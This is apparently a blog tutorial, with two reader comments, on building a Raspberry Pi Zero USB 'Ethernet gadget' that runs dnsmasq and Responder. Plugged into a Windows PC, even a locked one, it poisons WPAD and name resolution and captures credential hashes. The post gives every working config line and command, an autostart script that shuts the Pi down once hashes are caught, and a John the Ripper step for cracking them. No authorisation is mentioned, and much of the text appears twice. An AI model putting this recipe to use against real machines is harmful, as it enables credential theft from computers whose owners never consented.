So this is not all my own original work. This is a bringing together of the ethernet gadget tutorial by lady ada at adafruit and the beautiful work by Mubix at room362 which uses Laurent Gaffie's from SpiderLabs responder.py scripts.
I'm still using Mubix's recipe of USB Ethernet + DHCP + Responder == Creds but here we are using a £4.00 Raspberry Pi Zero instead of the USB armoury or the HAK5 LAN turtle. Both are awesome products.
Please note that this only works on the RPi Zero. Other RPi's will not work!
Download and install the latest Jessie Lite from here onto an SD Card.
Pop the card out of the card reader and re-insert it to mount it. Take your favorite text editor and edit the following two files in the boot partition.
Save the config.txt file.
Save the cmdline.txt file.
Eject the SD card and pop it in your RPi Zero.
Your RPi is now setup to be recognized as an Ethernet over USB device, but we have unconfigured network interfaces at both ends so you probably wont be able to do much with it just yet.
Let's boot up the RPi Zero and connect it to the internet to install a DHCP server and grab the responder scripts while we are at it.
For this section I connected my RPi to my ethernet switch using the OTG cable and a USB to ethernet converter and sshed to it. You could use a wireless dongle.
I'm not using the newly created usb0 interface until we are ready to deploy.
Sure you could share the internet from your PC with the RPi over your newly created USB0 interface, but thats a whole load of configuration with routes and iptables that we would then need to undo when we want to deploy the RPi.
Using your favorite linux editor edit /etc/network/interfaces
Find the USB0 section or create it to match the following
Of course you can configure whatever ip address and network you want in here, just make sure that it is consistent with the details that you configure in the DHCP server.
We are using dnsmasq as our DHCP server which we will also use to point clients to the responder.py for poisoning.
Edit /etc/dnsmasq.conf
Throwaway the default configuration and use the following:
Note that the IP addresses have to be consistent with the static IP address you configured on the usb0 interface. Importantly for the wpad.dat attack to work is the dhcp-option 252 which points at the IP address of the Pi to allow the responder script to attack it.
Also notice that port=0 configures dnsmasq to not be a DNS server as we want responder to be the poisonous DNS server.
The responder script currently detects if the responder.db file exists and creates it if not, if responder.db is an empty file it doesn't create the tables. The easiest way to deal with this is to delete the file /root/responder/Responder.db and allow the script recreate it correctly.
To get responder to startup when the the RPi boots and shutdown once crds have been obtained, add the following to /etc/rc.local
The inotify checks to see if the Responder.db has been updated and shutsdown the Pi. Because we are letting responder create the Responder.db file this won't work the first time we deploy the RPi.
To see what the commands are doing you can use screen to watch what is going on:
You can manually check the contents of the sqlite database with the command:
However the log files under /root/responder/logs contain a file that is perfectly formatted for cracking with John the Ripper Jumbo.
This will take some time...
Just plug the RPi Zero into the target machine using a standard micro usb cable in the usb connection. No power is needed. The RPi is powered via the usb port like so:
Give the RPi about 20 seconds to boot up, then wait. If you watch the screen on the target windows PC you will see the Ethernet gadget install and then within about 10 seconds you will see the PC trying to configure the proxy. All being well the RPi should detect the update to Responder.db and shut itself down. Unplug the RPi.
This will work regardless of whether the screen is locked or not allowing us to snag the network hashes.
On domained PCs windows NLA may kick in detecting a new network and stopping the wpad.dat attack from working, however leaving the RPi plugged in for a short while will provide a wealth of details about the network for further analysis.
I've had pretty good success with this on various windows machines, however I've found that this doesn't work well on VMs, perhaps something to do with the Ethernet gadget drivers.
I'm also looking for better ways to target domained up PCs to stop the network detection kicking in and preventing this from working. Let me know if you have any ideas!
I'm still using Mubix's recipe of USB Ethernet + DHCP + Responder == Creds but here we are using a £4.00 Raspberry Pi Zero instead of the USB armoury or the HAK5 LAN turtle. Both are awesome products.
Please note that this only works on the RPi Zero. Other RPi's will not work!
1.0 Setup the the RPi Zero for Ethernet over USB
Download and install the latest Jessie Lite from here onto an SD Card.
Pop the card out of the card reader and re-insert it to mount it. Take your favorite text editor and edit the following two files in the boot partition.
config.txt
Go to the bottom and add dtoverlay=dwc2 as the last line:
Save the config.txt file.
cmdline.txt
After rootwait (the last word on the first line) add a space and then modules-load=dwc2,g_ether
Save the cmdline.txt file.
Eject the SD card and pop it in your RPi Zero.
Your RPi is now setup to be recognized as an Ethernet over USB device, but we have unconfigured network interfaces at both ends so you probably wont be able to do much with it just yet.
Let's boot up the RPi Zero and connect it to the internet to install a DHCP server and grab the responder scripts while we are at it.
2.0 Preparing the RPi for Attack
For this section I connected my RPi to my ethernet switch using the OTG cable and a USB to ethernet converter and sshed to it. You could use a wireless dongle.
I'm not using the newly created usb0 interface until we are ready to deploy.
Sure you could share the internet from your PC with the RPi over your newly created USB0 interface, but thats a whole load of configuration with routes and iptables that we would then need to undo when we want to deploy the RPi.
2.1 Installing DHCP service
We are going to create a static ip address on usb0 and install dnsmasq as our dhcp server.Create a static config for usb0
Using your favorite linux editor edit /etc/network/interfaces
sudo vi /etc/network/interfaces
Find the USB0 section or create it to match the following
allow-hotplug usb0
iface usb0 inet static
address 192.168.200.1
netmask 255.255.255.0
iface usb0 inet static
address 192.168.200.1
netmask 255.255.255.0
Of course you can configure whatever ip address and network you want in here, just make sure that it is consistent with the details that you configure in the DHCP server.
Install dnsmasq
We are using dnsmasq as our DHCP server which we will also use to point clients to the responder.py for poisoning.
sudo apt-get install dnsmasq
Edit /etc/dnsmasq.conf
Throwaway the default configuration and use the following:
interface=usb0
dhcp-range=192.168.200.2,192.168.200.254,255.255.255.0,1h
dhcp-authoritative
dhcp-option=252,http://192.168.200.1/wpad.dat
log-queries
log-dhcp
port=0
dhcp-range=192.168.200.2,192.168.200.254,255.255.255.0,1h
dhcp-authoritative
dhcp-option=252,http://192.168.200.1/wpad.dat
log-queries
log-dhcp
port=0
Note that the IP addresses have to be consistent with the static IP address you configured on the usb0 interface. Importantly for the wpad.dat attack to work is the dhcp-option 252 which points at the IP address of the Pi to allow the responder script to attack it.
Also notice that port=0 configures dnsmasq to not be a DNS server as we want responder to be the poisonous DNS server.
2.2 Installing Responder
The following download responder.py and install the necessary dependencies
sudo su -
apt-get install -y python git python-pip python-dev screen sqlite3 inotify-tools
pip install pycrypto
git clone https://github.com/spiderlabs/responder
apt-get install -y python git python-pip python-dev screen sqlite3 inotify-tools
pip install pycrypto
git clone https://github.com/spiderlabs/responder
The responder script currently detects if the responder.db file exists and creates it if not, if responder.db is an empty file it doesn't create the tables. The easiest way to deal with this is to delete the file /root/responder/Responder.db and allow the script recreate it correctly.
rm /root/responder/Responder.db
2.3 Putting it all together
To get responder to startup when the the RPi boots and shutdown once crds have been obtained, add the following to /etc/rc.local
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'
# Shutdown once creds have been obtained
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /root/responder/Responder.db; do shutdown -h now; done'
exit 0
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'
# Shutdown once creds have been obtained
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /root/responder/Responder.db; do shutdown -h now; done'
exit 0
The inotify checks to see if the Responder.db has been updated and shutsdown the Pi. Because we are letting responder create the Responder.db file this won't work the first time we deploy the RPi.
To see what the commands are doing you can use screen to watch what is going on:
screen -r responder
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C
[+]NBT-NS & LLMNR responder started
Global Parameters set:
Challenge set is: 1122334455667788
WPAD Proxy Server is:ON
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:0
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF
NBT Name Service/LLMNR Answerer 1.0.
Please send bugs/comments to: [email protected]
To kill this script hit CRTL-C
[+]NBT-NS & LLMNR responder started
Global Parameters set:
Challenge set is: 1122334455667788
WPAD Proxy Server is:ON
HTTP Server is:ON
HTTPS Server is:ON
SMB Server is:ON
SMB LM support is set to:0
SQL Server is:ON
FTP Server is:ON
DNS Server is:ON
LDAP Server is:ON
FingerPrint Module is:OFF
You can manually check the contents of the sqlite database with the command:
sqlite3 /root/responder/Responder.db 'select * from responder'
However the log files under /root/responder/logs contain a file that is perfectly formatted for cracking with John the Ripper Jumbo.
./john logfile.txt
This will take some time...
3.0 Deploying the RPi Zero
Just plug the RPi Zero into the target machine using a standard micro usb cable in the usb connection. No power is needed. The RPi is powered via the usb port like so:
Give the RPi about 20 seconds to boot up, then wait. If you watch the screen on the target windows PC you will see the Ethernet gadget install and then within about 10 seconds you will see the PC trying to configure the proxy. All being well the RPi should detect the update to Responder.db and shut itself down. Unplug the RPi.
[ VIDEO ]
This will work regardless of whether the screen is locked or not allowing us to snag the network hashes.
On domained PCs windows NLA may kick in detecting a new network and stopping the wpad.dat attack from working, however leaving the RPi plugged in for a short while will provide a wealth of details about the network for further analysis.
I've had pretty good success with this on various windows machines, however I've found that this doesn't work well on VMs, perhaps something to do with the Ethernet gadget drivers.
I'm also looking for better ways to target domained up PCs to stop the network detection kicking in and preventing this from working. Let me know if you have any ideas!
Hi, is this solution still working (on your side)? I was not able to get any Responder.db or any DB entries. I tried the old Responder version (from here) as well as the new one: https://github.com/lgandx/Responder
ReplyDeleteI also tried this how-to: http://elevatedprompt.com/2016/09/snagging-credentials-from-locked-machines-with-raspberry-pi-zero/#comment-285
Cheers
Andre
Absolutely it is still working. Have you tried running it on an unlocked machine to see what the machine does?
DeleteHi, I want to make this run in Raspberry Pi 3. Do you think it is possible ?
ReplyDeleteIf possible, what you think I need to change in this tutorial ?
Cheers
Cris